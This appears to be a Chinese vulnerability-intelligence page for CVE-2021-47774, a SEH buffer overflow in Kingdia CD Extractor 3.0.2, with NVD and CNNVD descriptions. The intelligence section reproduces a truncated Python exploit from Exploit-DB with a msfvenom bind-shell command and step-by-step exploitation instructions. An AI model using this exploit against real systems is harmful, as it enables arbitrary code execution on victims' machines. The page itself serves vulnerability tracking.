一、 漏洞 CVE-2021-47774 基础信息
漏洞信息
# Kingdia CD Extractor 3.0.2 缓冲区溢出漏洞
N/A
神龙判断
是否为 Web 类漏洞: 未知
判断理由:
N/A
提示
尽管我们采用了先进的大模型技术,但其输出仍可能包含不准确或过时的信息。
神龙会尽力确保数据准确,但也请结合实际情况进行甄别与判断。
神龙祝您一切顺利!
神龙会尽力确保数据准确,但也请结合实际情况进行甄别与判断。
神龙祝您一切顺利!
漏洞标题
Kingdia CD Extractor 3.0.2 - Buffer Overflow (SEH)
来源:美国国家漏洞数据库 NVD
漏洞描述信息
Kingdia CD Extractor 3.0.2 contains a buffer overflow vulnerability in the registration name field that allows attackers to execute arbitrary code. Attackers can craft a malicious payload exceeding 256 bytes to overwrite Structured Exception Handler and gain remote code execution through a bind shell.
来源:美国国家漏洞数据库 NVD
CVSS信息
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
来源:美国国家漏洞数据库 NVD
漏洞类别
跨界内存写
来源:美国国家漏洞数据库 NVD
漏洞标题
Kingdia CD Extractor 缓冲区错误漏洞
来源:中国国家信息安全漏洞库 CNNVD
漏洞描述信息
Kingdia CD Extractor是Kingdia公司的一款音频格式转换工具。 Kingdia CD Extractor 3.0.2版本存在缓冲区错误漏洞,该漏洞源于注册名字段存在缓冲区溢出,可能导致执行任意代码。
来源:中国国家信息安全漏洞库 CNNVD
CVSS信息
N/A
来源:中国国家信息安全漏洞库 CNNVD
漏洞类别
缓冲区错误
来源:中国国家信息安全漏洞库 CNNVD
二、漏洞 CVE-2021-47774 的公开POC
| # | POC 描述 | 源链接 | 神龙链接 |
|---|
三、漏洞 CVE-2021-47774 的情报信息
标题: Kingdia CD Extractor 3.0.2 - Buffer Overflow (SEH) - Windows local Exploit -- 🔗来源链接
标签:exploit
神龙速读:### 关键信息 - **漏洞名称**: Kingdia CD Extractor 3.0.2 - Buffer Overflow (SEH) - **漏洞类型**: Buffer Overflow (SEH) - **Edb-ID**: 50470 - **CVE**: N/A - **作者**: STRESSER - **漏洞类型**: LOCAL - **平台**: WINDOWS - **日期**: 2021-11-02 - **受影响的应用**: Kingdia CD Extractor 3.0.2 - **验证状态**: EDB Verified: ✗ - **Exploit**: ✓ / {} ### 漏洞描述 该漏洞存在于Kingdia CD Extractor 3.0.2版本中,利用了缓冲区溢出(SEH)漏洞。 ### 漏洞利用步骤 1. 运行Python代码:`Kingdia.py` 2. 打开`EVIL.txt`文件并将所有内容复制到剪贴板 3. 打开Kingdia CD Extractor并点击Register 4. 将`EVIL.txt`的所有内容粘贴到'Name and Code Field' 5. 点击'OK' 6. 本地IP端口3110上监听以获得绑定shell 7. 致谢XiDreamzzXi和Metatron ### 漏洞代码 ```python # Exploit Title: Kingdia CD Extractor 3.0.2 - Buffer Overflow (SEH) # Date: 31.10.2021 # Software Link: https://en.softonic.com/download/kingdia-cd-extractor/windows/post-download # Exploit Author: Achilles # Tested Version: 3.0.2 # Tested on: Windows 7 64bit #!/usr/bin/env python import struct buffer = "\x41" * 256 nseh = "\xEB\x06\x90\x90" #jmp short 6 seh = struct.pack('<L',0x10037859) #SkinMagic.dll nops = "\x90" * 20 #msfvenom -p windows/shell_bind_tcp LPORT=3110 -f py -e x86/alpha_mixed EXITFUNC=thread -b "\x00\x0a\x0d" buf = b"" buf += b"\x89\xe0\xd9\xd9\x70\x59\x49\x49\x49\x49\x39" # More payload code... pad = "B" * (7736 - len(buffer) - len(nseh+seh) - len(nops) - len(buf)) payload = buffer + nseh + seh + nops + buf + pad try: f=open("Evil.txt","w") print "[+] Creating %s bytes evil payload.." %len(payload) f.write(payload) f.close() print "[+] File created!" except: print "File cannot be created" ``` ### 标签 - Exploits - Online - Windows - SEH - Buffer Overflow
标题: Kingdia CD Extractor Download - An application to extract audio from your CDs to MP3, WAV, WMA, OGG, VQF, APE -- 🔗来源链接
标签:product
神龙速读:从这个网页截图中,以下是一些关键信息,使用简洁的markdown格式列出: - **软件名称**: Kingdia CD Extractor 3.7 - **版本**: 3.7 - **开发者**: Kingdia Software Inc. - **下载情况**: 能够下载软件,显示为一个大蓝色的下载按钮 - **评分**: 显示有用户评分,当前的评分平均为4星,基于1个评价 - **系统要求**: - Microsoft Windows 95/98/Me/NT/2000/XP/2003 或更高版本 - CD-ROM 驱动器 - Intel Pentium 或兼容处理器 - Adaptec's ASPI for Win32 Manager - **功能**: - CD抓取应用,支持内置CD播放器、多CD-ROM支持,多种输出文件命名格式、支持远程和本地CDDB,自动获取 disc 信息,支持ID3标签等。 - **优点**: - 易于使用 - 支持多种格式 - **版权与使用信息**: 显示为共享软件,目前有1人使用 - **过版信息**: 显示软件的旧版本链接,例如Kingdia CD Extractor 3.6.17、3.5、3.0.0等 - **页面活动**: 显示了用户评论区和评分投票功能
- https://nvd.nist.gov/vuln/detail/CVE-2021-47774
四、漏洞 CVE-2021-47774 的评论
暂无评论